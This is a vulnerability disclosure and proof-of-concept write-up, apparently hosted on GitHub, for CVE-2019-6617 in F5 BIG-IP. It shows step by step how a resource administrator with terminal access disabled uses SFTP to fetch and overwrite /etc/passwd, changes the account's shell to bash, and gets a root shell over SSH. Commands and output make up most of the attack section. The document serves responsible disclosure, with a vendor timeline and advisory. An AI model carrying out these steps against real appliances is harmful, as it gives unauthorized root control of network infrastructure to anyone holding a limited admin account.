Skip to content
Permalink
Branch: master
Find file Copy path
Find file Copy path
1 contributor

Users who have contributed to this file

140 lines (99 sloc) 3.71 KB
Title: F5 BIG-IP Resource Administrator Privilege Escalation
Author: Rich Mirch
CVE: CVE-2019-6617
Vendor Advisory: https://support.f5.com/csp/article/K38941195
Description
An F5 BIG-IP account with the resource administrator role while also having
terminal access disabled still has the ability to access the appliance via
SFTP as root. This PoC will show that a resource administrator can obtain root
access to the appliance and take full control with terminal access disabled.
Technical details
A local account configured with the resource administrator role is created as
a Linux user with uid set to zero/root. SSH is not allowed when terminal
access is disabled. The problem is that the SFTP service is still allowed
without any restrictions. Since a resource administrator account is a Linux
root account, it has the ability to overwrite any file on the system.
Note: The SSH service must be enabled and the management interface accessible.
CVSS
Vector: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O/RC:C
Base: 7.2
Temporal: 6.9
Test Environment
F5 BIG-IP Virtual Edition 14.0.0.1
[root@bigip14:Active:Standalone] ~ # tmsh show sys version
Sys::Version
Main Package
Product BIG-IP
Version 14.0.0.1
Build 0.0.2
Edition Point Release 1
Date Fri Aug 17 16:22:25 PDT 2018
A resource administrator account(resadmin) with the following attributes was used for this PoC.
Note the shell attribute is set to “none".
[root@bigip14:Active:Standalone] ~ # tmsh list auth user resadmin | grep -v encrypted-password
auth user resadmin {
description resadmin
partition Common
partition-access {
all-partitions {
role resource-admin
}
}
shell none
}
Proof Of Concept
[Step 1]
Show that resadmin is not allowed to SSH.
$ ssh resadmin@5.6.7.8
Password:
Last login: Thu Sep 13 15:23:23 2018 from 1.2.3.4
This account is currently not available.
Connection to 5.6.7.8 closed.
[Step 2]
Connect to the appliance as resadmin via SFTP and retrieve the /etc/passwd file.
$ /usr/bin/sftp resadmin@5.6.7.8
Password:
Connected to 5.6.7.8.
sftp> get /etc/passwd
Fetching /etc/passwd to passwd
/etc/passwd 100% 1423 229.8KB/s 00:00
sftp> quit
[Step 3]
Update the local passwd file and change /sbin/nologin to /bin/bash for the resadmin user.
$ perl -p -i.orig -e 's!/sbin/nologin!/bin/bash! if /^resadmin/;' passwd
[Step 4]
Display a diff of the passwd change from step 3.
$ diff -u passwd.orig passwd
--- passwd.orig 2018-09-13 17:32:55.000000000 -0500
+++ passwd 2018-09-13 17:34:36.000000000 -0500
@@ -26,4 +26,4 @@
hsqldb:x:96:96::/var/lib/hsqldb:/sbin/nologin
syscheck:x:199:10::/:/sbin/nologin
restnoded:x:198:198::/:/sbin/nologin
-resadmin:x:0:500:resadmin:/home/resadmin:/sbin/nologin
+resadmin:x:0:500:resadmin:/home/resadmin:/bin/bash
[Step 5]
SFTP as resadmin and upload the modified passwd file to /etc/passwd.
$ /usr/bin/sftp resadmin@5.6.7.8
Password:
Connected to 5.6.7.8.
sftp> cd /etc
sftp> put passwd
Uploading passwd to /etc/passwd
passwd 100% 1419 541.3KB/s 00:00
sftp> quit
[Step 6]
Login as resadmin via SSH and obtain a bash shell running as the root user.
$ ssh resadmin@5.6.7.8
Password:
Last login: Thu Sep 13 15:30:39 2018 from 1.2.3.4
[resadmin@bigip14:Active:Standalone] ~ # echo $SHELL
/bin/bash
[resadmin@bigip14:Active:Standalone] ~ # id
uid=0(root) gid=500(webusers) groups=500(webusers),495(sdm) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
Timeline:
2018-09-13: Reported to vendor
2018-09-14: Vendor confirmed vulnerability
2018-09-26: Vendor requested embargo
2018-12-07: Contacted vendor for update
2019-04-30: Vendor released fix and advisory
You can’t perform that action at this time.